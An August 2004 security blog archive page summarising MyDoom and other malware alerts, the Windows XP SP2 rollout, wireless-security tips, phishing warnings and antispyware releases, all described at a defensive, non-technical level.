August 2004 - Posts
McAfee, Trend, and other AV vendors have declared this as MEDIUM RISK due to prevelance.
MyDoom.S - MEDIUM RISK (appears as archieved photos)
This virus is received in an email message as follows:
Subject : photos
Attachment : photos_arc.exe
SOME BAD NEWS ON THIS ONE: If MyDoom.S infects your PC, it will attempt to download BackDoor-CHR. Once this stealthing driver is running on the victim machine, this threat is not detected by conventional AV scanning methods.
BackDoor-CHR - hidden backdoor installed by MyDoom.S
This remote access trojan is downloaded by W32/Mydoom.s@MM . It bears the following characteristics:
* stealths its activity on the victim machine
* serves as a HTTP and SMTP proxy
* attempts to connect to numerous remote IRC servers
appends the local hosts file (in an attempt to disable updating of many AV products)
* The trojan attempts to connect to a remote IRC server to await command. It carries a list of IP addresses and relevant ports for these servers ...
The Internet Storm Center shares some great information on user experiences for installing Service Pack 2 (SP2). Users will benefit greatly from the major security improvements found in SP2 but should carefully check their current configurations for any issues.
Windows XP SP2 - Installation Experiences
Microsoft documents programs that may behave differently
Windows XP SP2 - Over 500 users record experiences
This concise article provides some excellent strategies for improved wireless network security. A brief summary with quotes is noted below.
1. Don't breach your own firewall
You've almost certainly firewalled the network, wireless or not, and rightly so. However, you've done yourself no good if your configuration doesn't place your wireless system's access points outside the firewall.
2. Don't spurn Media Access Control
Media Access Control (MAC) is often ignored because it's not spoof-proof. But it is another brick in the wall: It's essentially another address filter, and it clogs up the works for the potential hacker. What it does is limit network access to registered devices that you identify on address-based access control rosters.
3. Don't spurn WEP
The Wired Equivalent Privacy (WEP) is a protocol specific to wireless security, conforming to the 802.11b standard. It encrypts data as it goes wireless, over and above anything else you're using. Use it. But remember that it is key-based, so don't stay with the default key. You may even wish to create a unique WEP key for individual users when they first access the system. Yet don't rely on WEP alone.
4. Don't allow unauthorized access points
Access points are so incredibly easy to set up, and an over-burdened IT department might easily simply loosen the rules to allow them to be set up on an as-needed basis by anyone smart enough to run a VCR. But don't succumb to this temptation. The access point is a primary target for an intruder. Implement a deployment strategy and procedure, and stick to them.
5. Don't permit ad-hoc laptop communication
This is a tough one to enforce in any enterprise. Ad-hoc mode lets Wi-Fi clients link directly to another nearby laptop, which is so convenient, you just can't imagine not using it.
Clark Howard hosts a national talk radio show providing advice on financial and consumer matters. As a regular part of this broadcast, listeners are often warned on scams that are circulating in the public. This article appears in the latest Clark Howard newsletter discussing the need to be vigilant while processing email messages.
Banks, ISPs, and financial institutions never process confidential information through email, so it's always important to validate these transactions even if the email appears to be authentic.
E-mail phishing scams steal millions
Criminals are usually pretty stupid. But sometimes criminals are so brilliant that they seem unstoppable and indestructible. One recent crime wave involves “phishing” e-mails, and unfortunately criminals are having tremendous success with it.
What happens is these clever crooks send you an e-mail, pretending to be from your bank, credit card company, Internet service or auction site. They convince you that you need to verify your information by using very realistic graphics and phony but very believable Web sites. You think you’re verifying the information, but you’re really handing over your financial information criminals and they’re stealing your money.
According to Gardener Inc., criminals have stolen between $2 and $3 billion over the past year. The average amount stolen is about $1,200. The e-mails you receive are so realistic that people don’t even realize or remember that they have responded. Yet about one in 30 are responding. Whenever you get one of these official looking e-mails, don’t bite.
No organization would send you an e-mail like this. If you think your bank is contacting you, don’t click. Call your bank on the phone and ask someone. In many cases, if you get scammed, your bank will give you your money back. But in the meantime, you don’t have any money.
There were no security updates for workstations and servers during August 2004. So most administrators and home users can rest after a busy round of updates in July. The only update for August was an Exchange 5.5 security update as described below.
MS04-026- Exchange 5.5 cross-site scripting and spoofing patch
This is a cross-site scripting and spoofing vulnerability. The cross-site scripting vulnerability could allow an attacker to convince a user to run a malicious script. If this malicious script is run, it would execute in the security context of the user. Attempts to exploit this vulnerability require user interaction. This vulnerability could allow an attacker access to any data on the Outlook Web Access server that was accessible to the individual user.
1: Firewall Enabled by Default
2: Messenger is Disabled by Default
3: Firewall Protects the Computer at Boot Time
4: Hundreds of New GPO Settings
5: Messenger Can Block Unsafe File Transfers
6: Memory Protection
7: Outlook Express E-mail Controls
8: Internet Explorer Add-On Management
9: Internet Explorer Download Prompting
10 Windows Update Services Support
F-Secure's weblog highlights the anniversary of Blaster today.
Blaster wasn't the first Internet worm that impacted Microsoft technologies. Many of us fought the Code Red Internet worms in August 2001, which impacted IIS web servers. However, Blaster impacted both servers and workstations, so that millions of home and corporate users were impacted, rather than server administrators (who worked behind the scenes to quickly resolve these issues).
This was a bad day for Microsoft, but I believe it led to many positive developments we enjoy today. Here are some examples:
* I've seen a "night and day" difference in System Administrators taking security patches and updates more seriously in the corporate world.
* Microsoft made improvements to their Windows Update approach (e.g., standard release date, ratings system, greater automation for users)
* Microsoft established a "bounty" system that has led to the arrest of some worm authors.
* Microsoft started providing worm cleaners and improved security baseline measurement tools.
* I also believe some of the major security improvements we see in XP SP2 is a direct result of this major Internet worm attack.
Blaster one year later (see August 10th entry)
AdAware SE was released overnight and represents the latest from LavaSoft in Spyware removal technologies. Spybot 1.3, Adaware SE, and Merjin's CWS Shredder are "must haves" in the network technicians tool kit. AdAware SE Product Information http://www.lavasoftusa.com/news/product/
quote: Ad-Aware is designed to provide advanced protection from known Data-mining, aggressive advertising, Parasites, Scumware, selected traditional Trojans, Dialers, Malware, Browser hijackers, and tracking components. With the release of Ad-Aware SE Personal edition, Lavasoft takes the fight against Spyware to the next level. DOWNLOAD SITES for freeware version.
With Lavasoft’s all new Code Sequence Identification (CSI) technology, you will not only be protected from know content, but will also have advanced protection against many of their unknown variants. To further protect you, Ad-Aware SE Personal Edition also has the capability to scan and list Alternate Data Streams (ADS) in NTFS enabled volumes. In combination with the new scanning engine, Ad-Aware SE will scan your computer faster and more thoroughly than ever before!
This is a mass-mailing worm which has the following characteristics:
* contains its own SMTP engine to construct outgoing messages
* harvests email addresses from the victim machine
* the From: address of messages is spoofed
* attachment is a zip file, which contains an EXE and HTML file
* contains a remote access component (notification is sent to hacker)
* copies itself to folders that have the phrase shar in the name (such as common peer-to-peer applications; KaZaa, Bearshare, Limewire, etc)
* The worm sends out a ZIP file which contains an HTML and EXE file. The EXE file is within a folder in the ZIP file so that when it's viewed with Explorer (rather than a stand-alone ZIP file handler like WinZip or PKzip) the HTML file and a separate folder is what is visible.
The HTML file contains exploit code which, on vulnerable systems, will automatically run the EXE file which is a downloader trojan. The downloader trojan then contacts a large number of remote websites to retrieve the virus itself.
SAMPLE EMAIL FORMAT
From : (address is spoofed)
Subject : (blank)
There is indication in the file that it may also try to password-protect some ZIP files, in which case it will add one of the following to the message body:
The password is
The password will then be contained in an embedded image file.
Attachment: (may be one of the following)
All new variants of the MyDoom family should be carefully monitored as the new "R" variant emerged overnight.
MyDoom.R - New Variant
This new variant bears the following characteristics:
* contains its own SMTP engine for constructing messages
* harvests target email addresses from the victim machine
* forges the From: header of outgoing messages
* downloads a file from a remote server
This provides excellent planning information for deployment of Windows XP SP2 in the corporate environment.
Windows XP SP2 - Key resources for IT Professionals
Features and Functionality
Changes to Functionality in Microsoft Windows XP Service Pack 2 -- Recently updated, this document provides detailed information about the changes to network protection, memory protection, email handling, enhanced browser security, and other technologies included in Windows XP Service Pack 2.
FAQ: How Windows XP Service Pack 2 Affects Systems Management Server 2003 -- Review the Windows XP section of the SMS Client FAQ to find out how Microsoft Windows XP SP2 affects SMS client and SMS administration from a computer running XP SP2.
FAQ: How Windows XP Service Pack 2 Affects SQL Server and MSDE -- Review this FAQ to find answers to common questions about how Microsoft Windows XP SP2 affects installations of SQL Server 2000 and SQL Server Desktop Engine (MSDE).
New Networking Features in Windows XP SP2 -- This service pack includes new networking features, providing enhanced security and additional functionality for wireless users and peer-to-peer network applications.
Enterprise Computing and Windows XP SP2 -- This on-demand TechNet Support webcast addresses some of the major improvements Microsoft Windows XP Service Pack 2 provides for businesses that have an enterprise computing environment
Brador is the first known backdoor for the Pocket PC hand-held devices. When run, the backdoor copies itself to startup folder, mails the IP address of the PDA to the backdoor author and starts listening commands on a TCP port. The hacker can then connect back to the PDA via TCP port and control the PDA through the backdoor.
Microsoft is preparing Windows XP SP2 for public distribution soon and this site is devoted to some of the key support questions regarding this upgrade.
Key Links for Windows XP SP2 information
If you use these complementary browsers, four vulnerabilties were patched overnight. It is recommended that you upgrade as soon as possible. Firefox 0.9.3 is working well for me in my early testing.
Firefox 0.9.3 - FTP Site (all OS's and builds)
Mozilla 1.7.2 - FTP Site (all OS's and builds)
Firefox 0.9.3 - Download Link for EXE version
This link shares some of the forthcoming features that will be part of Service Pack 2. It is expected by the end of August 2004 for production release.
F-Secure has also authored to assist in this process also.
MyDoom author wanted -- $250,000 Bounty by Microsoft
THIS IS A PUBLIC MESSAGE FROM F-SECURE TO ANYBODY WHO MIGHT HAVE INFORMATION ON THE WHEREABOUTS OF THE PERSON OR PERSONS BEHIND THE MYDOOM VIRUS FAMILY
We are urging anyone who knows the party behind Mydoom variants to contant the authorities, let them know who's behind it and to collect $250,000. Microsoft offered this public bounty reward on Mydoom on March 11th. It's still valid.
If you have information on the origin of Mydoom, you're most likely connected to spamming in one way to the other (as Mydoom is used to create spam proxies). So you should be able to appreciate money. $250,000 is a lot of money. Think about it.
Report all information on the whereabouts of the virus writers behind Mydoom via the forms at Internet Fraud Complaint Center or FBI. Remember to mention that you're interested in collecting the Microsoft bounty. Feel free to report via a remailer using a fake identity and leave an E-Gold account. As long as you report. Do it now. If you're uneasy about filling forms and sending them to FBI, just contact us. We will work with you.
CERT provides a number of excellent articles in their Reading Room and this link provides the last 25 articles published
This new variant is beginning to spread in the wild as reported by the Internet Storm Center:
Secunia link for several AV vendors
McAfee's description of new "Q" variant
DAT 4383 or daily DATs required
An excellent 15 page article from one of my favorite security sites.
CERT: The challenges of Security Management
For all folks using Windows XP, it is advised that you do another Windows Update to ensure that your patches have been correctly updated. Microsoft stated the following:
"Subsequent to the release of this security bulletin, Microsoft was made aware that the update provided for Windows XP customers running the new version of Windows Update, Windows Update Version 5, did not contain the final release code for the vulnerabilities addressed in the security bulletin. Microsoft has corrected the update and is re-releasing this bulletin to advise of the availability of a revised update available to Windows Update Version 5 customers. Customers who are utilizing Windows Update Version 4, the vast majority of customers, are not affected by this revision."
More Posts « Previous page
- Next page »